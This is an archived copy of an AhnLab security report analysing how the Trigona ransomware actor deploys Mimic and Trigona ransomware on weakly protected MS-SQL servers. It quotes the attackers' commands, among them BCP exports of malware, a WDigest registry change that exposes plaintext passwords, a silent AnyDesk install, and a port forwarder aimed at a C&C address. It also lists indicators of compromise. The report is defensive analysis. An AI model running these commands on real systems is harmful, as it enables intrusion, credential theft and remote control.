{
	"id": "e1140028-9630-4f73-87b5-d300047c8f2b",
	"created_at": "2026-04-06T00:06:11.209622Z",
	"updated_at": "2026-04-10T03:19:55.517124Z",
	"deleted_at": null,
	"sha1_hash": "81d50f4422b2cdc400363c8f17b0954297964b0e",
	"title": "Trigona Ransomware Threat Actor Uses Mimic Ransomware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 893300,
	"plain_text": "Trigona Ransomware Threat Actor Uses Mimic Ransomware\r\nBy ATCP\r\nPublished: 2024-01-21 · Archived: 2026-04-05 22:23:10 UTC\r\nAhnLab SEcurity intelligence Center (ASEC) has recently identified a new activity of the Trigona ransomware threat actor installing Mimic ransomware. Like past cases, the recently detected attack targets MS-SQL servers and is notable for exploiting the Bulk Copy Program (BCP) utility in MS-SQL servers during the malware installation process.\r\nTrigona ransomware: Known to have been active since at least June 2022 [1]; usually targets MS-SQL servers for attacks and is still active.\r\nMimic ransomware: First found in June 2022 [2]. In January 2024, a case was identified where a Turkish-speaking threat actor attacked poorly managed MS-SQL servers and installed Mimic [3].\r\nASEC first discovered a case of attack using BCP to install Mimic in early January 2024. In mid-January 2024, similar attacks were identified in which Trigona was installed instead of Mimic. The threat actor’s email address used in Mimic’s ransom note was not found in other attack cases, but Trigona’s ransom note identified later contained an email address that the Trigona threat actor has been using since early 2023 [4]. Accordingly, the attack detected in mid-January 2024 is thought to have been launched by the previously known Trigona threat actor, who is also believed to be the same attacker behind the Mimic ransomware attack discovered in early January 2024. This is based on the facts that both cases targeted poorly managed MS-SQL servers, BCP was used for malware installation, and the various strings and paths used in the attacks were the same. In addition, the same malware was used in each attack case.\r\n1. Trigona Ransomware\r\nTrigona ransomware is developed in Delphi and uses the RSA and AES encryption algorithms when encrypting files. A report by Arete in February 2023 confirmed a case of Trigona exploiting the ManageEngine vulnerability (CVE-2021-40539) [5]. Also, in April 2023, AhnLab’s ASEC Blog covered a case where it targeted poorly managed MS-SQL servers [6].\r\nMS-SQL servers were targeted again in the recent attack case, as in the cases of 2023, and from the threat actor’s email address saved in the ransom note, it can be confirmed that the recently detected Trigona ransomware’s threat actor is the same attacker responsible for the previous cases.\r\nEmail: farusbig@tutanota[.]com\r\nURL: hxxp://znuzuy4hkjacew5y2q7mo63hufhzzjtsr2bkjetxqjibk4ctfl7jghyd[.]onion/\r\nhttps://asec.ahnlab.com/en/61000/\r\nPage 1 of 11\n\nFigure 1. Encrypted files and a ransom note\r\n2. Mimic Ransomware\r\nMimic ransomware is known for exploiting a file search program called Everything while looking for files to encrypt. The threat actor is believed to be employing the Everything tool to accelerate the encryption of files in the target system. The attacker also copied some features of Conti ransomware, whose source code was leaked, during the development stage [7].\r\nThe Mimic ransomware samples in the Trend Micro report released in January 2023 and the Securonix report released in January 2024 had almost the same external structure as the one used in this attack. The malware was made into a 7z SFX executable and contains a compressed file named “Everything64.dll”, which is a password-protected collection of the actual malware files and the Everything tool. When the malware is executed, the 7z and “Everything64.dll” compressed files are decompressed using the appropriate passwords as shown below.\r\n\u003e 7za.exe x -y -p58042791667523172 Everything64.dll\r\n\u003e 7za.exe x -y -p624417568130113444 Everything64.dll\r\nFigure 2. Files included in 7z SFX and the compressed file\r\nThe folder that is ultimately installed contains not only Mimic ransomware and the Everything tool, but also the Defender Control tool (DC.exe) for deactivating Windows Defender and the SDelete tool (xdel.exe) from Sysinternals.\r\nFigure 3. Installed files\r\nThe threat actor’s email address in the ransom note is different from those used in the Mimic ransomware samples in the January 2023 Trend Micro report and the January 2024 Securonix report, and it is not found in other attack cases either. On the other hand, it is presumed that the Trigona ransomware threat actor is also using Mimic in their attacks, based on multiple circumstances that will be discussed later in this post.\r\nEmail: getmydata@list.ru\r\nFigure 4. Encrypted files and a ransom note\r\n3. Malware Installed Using BCP\r\nAttack targets are deemed to be poorly managed and externally exposed MS-SQL servers that have simple account credentials, rendering them vulnerable to brute force or dictionary attacks. This can be inferred not only from the fact that the Trigona ransomware threat actor has targeted these systems in past attacks, but also from infection logs of malware including LoveMiner and Remcos RAT from before and after the respective attack processes.\r\n3.1. Files Created Using BCP\r\nThe BCP utility bcp.exe is a command line tool used to import or export high volumes of external data in MS-SQL servers. It is generally used to save large amounts of data stored in SQL server tables to a local file, or to import data files stored on the local system into SQL server tables.\r\nThreat actors that target MS-SQL servers typically use PowerShell commands to download malware. Recently, some have been exploiting SQLPS, a PowerShell tool included in SQL servers [8]. However, in this attack case, the threat actor most likely employed the method of saving their malware in a database and using BCP to create a local file from it.\r\nFigure 5. Creating malware using BCP\r\nThe threat actor used the following command on “uGnzBdZbsi”, the table containing the Trigona ransomware binary, to export Trigona to a local path. Note that “FODsOZKgAU.txt” is a format file that is thought to contain format information.\r\nFigure 6. BCP command used in the attacks\r\nThe following are BCP commands used to export the various malware and tools used in the attacks.\r\nAnyDesk\r\n\u003e bcp “select binaryTable from uGnzBdZbsi” queryout “C:\\users\\%ASD%\\music\\AD.exe” -T -f “C:\\users\\%ASD%\\music\\FODsOZKgAU.txt”\r\nPort forwarder malware\r\n\u003e bcp “select binaryTable from uGnzBdZbsi” queryout “C:\\users\\%ASD%\\music\\4.exe” -T -f “C:\\users\\%ASD%\\music\\FODsOZKgAU.txt”\r\nLauncher malware\r\n\u003e bcp “select binaryTable from uGnzBdZbsi” queryout “C:\\ProgramData\\pp2.exe” -T -f “C:\\ProgramData\\FODsOZKgAU.txt”\r\n\u003e bcp “select binaryTable from uGnzBdZbsi” queryout “C:\\users\\%ASD%\\music\\pp2.exe” -T -f “C:\\users\\%ASD%\\music\\FODsOZKgAU.txt”\r\nMimic ransomware\r\n\u003e bcp “select binaryTable from uGnzBdZbsi” queryout “C:\\ProgramData\\K2K.txt” -T -f “C:\\ProgramData\\FODsOZKgAU.txt”\r\n\u003e bcp “select binaryTable from uGnzBdZbsi” queryout “C:\\users\\%ASD%\\K3K.txt” -T -f “C:\\users\\%ASD%\\FODsOZKgAU.txt”\r\nTrigona ransomware\r\n\u003e bcp “select binaryTable from uGnzBdZbsi” queryout “C:\\users\\%ASD%\\music\\build.txt” -T -f “C:\\users\\%ASD%\\music\\FODsOZKgAU.txt”\r\nOthers\r\n\u003e bcp “select binaryTable from uGnzBdZbsi” queryout “C:\\ProgramData\\kkk.bat” -T -f “C:\\ProgramData\\FODsOZKgAU.txt”\r\n\u003e bcp “select binaryTable from uGnzBdZbsi” queryout “C:\\ProgramData\\kur.bat” -T -f “C:\\ProgramData\\FODsOZKgAU.txt”\r\n\u003e bcp “select binaryTable from uGnzBdZbsi” queryout “C:\\users\\%ASD%\\music\\kkk.bat” -T -f “C:\\users\\%ASD%\\music\\FODsOZKgAU.txt”\r\n3.2. Looking Up Information\r\nThe commands that the threat actor first executes before creating the malware with BCP (meaning that the attack was successful) are those that look up the infected system’s information, as shown below. The threat actor would install malware suitable for the environment based on the information gained through these commands.\r\n\u003e hostname\r\n\u003e whoami\r\n\u003e wmic computersystem get domain\r\n\u003e wmic computersystem get totalphysicalmemory\r\n3.3. Stealing Account Credentials\r\nThe Trigona threat actor is known to use Mimikatz to steal account credentials [9] [10]. While no logs of Mimikatz were found in the attack process, the attacker sometimes executed a command to configure the UseLogonCredential registry key to obtain plain text passwords using the WDigest security package.\r\n\u003e REG ADD “HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\wdigest” /v UseLogonCredential /t REG_DWORD /d 0x00000001\r\n3.4. AnyDesk\r\nIn addition, the threat actor installed AnyDesk to control the infected system. AnyDesk is a remote administration tool that provides various features such as remote desktop and file transfer. Remote desktop is a feature that allows a user to remotely access an environment where RDP or AnyDesk is installed and control it through the GUI. AnyDesk is a major remote administration tool exploited not only by the aforementioned Trigona ransomware attacker, but also by most threat groups. There are many cases where remote administration tools are used for legitimate purposes such as working from home or remote control and management. Accordingly, anti-malware products cannot simply detect and block these tools, unlike typical malware. Threat actors take advantage of this fact to install remote administration tools instead of RAT-type malware during the initial access or lateral movement phases to control the target system.\r\n\u003e %SystemDrive%\\users\\%ASD%\\music\\AD.exe --install C:\\”Program Files (x86)”\\ --silent\r\n\u003e %SystemDrive%\\”Program Files (x86)”\\AnyDesk-ad_1514b2f9.exe --get-id\r\n4. Analysis of Malware Used in the Attack\r\nBesides the use of BCP, another notable fact about the recently confirmed attack cases is that there is evidence of safe mode being utilized. Two additional malware strains deemed to have been created by the threat actor were also found in the Mimic and Trigona ransomware attacks.\r\nOne is a launcher that registers itself as a service that can run even in safe mode. When it is run as a service, it executes the program given as an argument. The other is a port forwarder malware which, like the launcher, registers itself as a service that can be run in safe mode. It then activates RDP and supports RDP port forwarding to the address given as an argument.\r\nAccording to the PDB information, the threat actor named the launcher malware “app2” and the port forwarder “client”.\r\nFigure 7. Malware strains created by the threat actor with similar PDB information\r\nAlthough no malware or command log that sets the system boot option to safe mode was found, logs of the MS-SQL server process executing a system restart command were identified, as shown below. As the launcher deactivates the safe mode boot option after executing the malware given as an argument, it is likely that the threat actor installed the malware and then rebooted the system in safe mode to run the ransomware.\r\n\u003e shutdown -r -f -t 5\r\n4.1. Launcher Malware\r\nThe threat actor executed the launcher malware with the arguments shown below. Upon execution, the launcher copies itself into the “C:\\windows\\temp\\LeVfeNXHoa” path. It then carries out the next task according to the given arguments. The first argument gives the service name and the second argument gives the path of the file to be copied. The file in the path given by the second argument is moved to the path given by the third argument. The file given through the second argument was the Mimic ransomware.\r\n\u003e %ALLUSERSPROFILE%\\pp2.exe 1111111 c:\\programdata\\K2K.txt c:\\programdata\\2K.EXE\r\nThe launcher registers itself as a service under the name “1111111”, which was given as the first argument, and runs additional tasks to allow itself to run in safe mode. Afterward, it executes the ransomware in the path given as the third argument while running as a service. When the process is complete, it deactivates the safe mode option, allowing the system to boot normally again.\r\nFigure 8. Routine of setting the safe mode option for the registered service and deactivating this option after executing the ransomware\r\n4.2. Port Forwarder\r\nThe threat actor gave the following arguments to execute the port forwarder malware. Port forwarding is a feature where data transmitted to a certain port is forwarded to another port. This malware supports port forwarding to the RDP service, or port 3389. Generally, RDP-related port forwarding tools are used to overcome the fact that the threat actor cannot directly access a NAT environment from outside.\r\nThe port forwarder first connects to the threat actor’s address using the reverse connection method and then connects to the RDP port of the infected system, relaying the two connections. Accordingly, the threat actor is able to establish an RDP connection even if the target system is running in a NAT environment, allowing them to control the infected system remotely. Because RDP is utilized in this manner, the malware may execute the following commands to additionally enable the RDP service.\r\nFigure 9. RDP service activation routine\r\nWhen the port forwarder is executed in installation mode, it copies itself into the “C:\\windows\\temp\\WindowsHostServicess.exe” path and registers itself as a service under the name “WindowsHostServicess”. The service is configured so that it can be run in safe mode, like the launcher malware above.\r\n\u003e %SystemDrive%\\users\\%ASD%\\music\\4.exe --ip “2.57.149[.]233” --port “3366” --install\r\nThe port forwarder has five arguments. Three of these are modes that support the installation, uninstallation, and execution features. In execution mode, it does not go through the service installation process mentioned above and instead connects to the C\u0026C server given as an argument to support port forwarding.\r\nArgument Description\r\n--install Installation mode\r\n--uninstall Uninstallation mode\r\n--run Execution mode\r\n--ip C\u0026C server’s IP address\r\n--port C\u0026C server’s port number\r\nTable 1. Port forwarder arguments\r\nBefore connecting to the C\u0026C server, it saves basic system information such as the OS info and user and computer names in the “C:\\windows\\temp\\elZDk6geQ8” path, transmitting the information upon the initial connection.\r\nFigure 10. System information forwarded to the C\u0026C server\r\nThen, it can perform port forwarding or auto-deletion based on the commands it receives from the C\u0026C server.\r\nCommand Feature\r\n0x8CC03FAF Start port forwarding between the C\u0026C server and the RDP service\r\n0x0002C684 Auto-delete\r\nTable 2. Port forwarder commands\r\n5. Conclusion\r\nRecently, the Trigona ransomware threat actor has been installing the Mimic and Trigona ransomware on poorly managed MS-SQL servers. It has been found that the attacker also attempted to use port forwarding malware to establish an RDP connection to the infected system and control it remotely.\r\nRansomware threat actors encrypt infected systems and steal sensitive information to threaten the victims and raise profits. Because they employ various techniques for account credential theft and lateral movement, single systems as well as the entire internal company network may be at risk of being compromised, resulting in sensitive data being stolen and systems in the network being encrypted.\r\nTypical attacks that target MS-SQL servers include brute force attacks and dictionary attacks against systems where account credentials are poorly managed. Administrators must use passwords that cannot be easily guessed and change them periodically to protect database servers from brute force and dictionary attacks.\r\nV3 must also be updated to the latest version to block malware infection in advance. Administrators should also use security programs such as firewalls for database servers accessible from outside to restrict access by external threat actors. If the above measures are not taken in advance, continuous infections by threat actors and malware can occur.\r\nFile Detection\r\n– Trojan/Win.Generic.R531737 (2022.10.27.00)\r\n– HackTool/Win.DefenderControl.C5481630 (2023.09.06.00)\r\n– Ransomware/Win.Mimic.C5543473 (2023.11.18.01)\r\n– Ransomware/Win.Filecoder.C5561780 (2023.12.12.01)\r\n– Trojan/Win.Agent.C5574264 (2024.01.14.03)\r\n– Trojan/Win.Agent.C5574265 (2024.01.14.03)\r\nBehavior Detection\r\n– Malware/MDP.Minipulate.M71\r\n– Persistence/MDP.AutoRun.M203\r\n– DefenseEvasion/MDP.ModifyRegistry.M1234\r\n– Ransom/MDP.Decoy.M1171\r\n– CredentialAccess/MDP.Mimikatz.M4367\r\nMD5\r\n3e26e778a4d28003686596f988942646\r\n6d44f8f3c1608e5958b40f9c6d7b6718\r\na02157550bc9b491fd03cad394ccdfe7\r\na24bac9071fb6e07e13c52f65a093fce\r\na6e2722cff3abb214dc1437647964c57\r\nURL\r\nhttp[:]//2[.]57[.]149[.]233[:]3366/\r\nAdditional IOCs are available on AhnLab TIP.\r\nGain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click the banner below.\r\nSource: https://asec.ahnlab.com/en/61000/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://asec.ahnlab.com/en/61000/"
	],
	"report_names": [
		"61000"
	],
	"threat_actors": [],
	"ts_created_at": 1775433971,
	"ts_updated_at": 1775791195,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/81d50f4422b2cdc400363c8f17b0954297964b0e.pdf",
		"text": "https://archive.orkl.eu/81d50f4422b2cdc400363c8f17b0954297964b0e.txt",
		"img": "https://archive.orkl.eu/81d50f4422b2cdc400363c8f17b0954297964b0e.jpg"
	}
}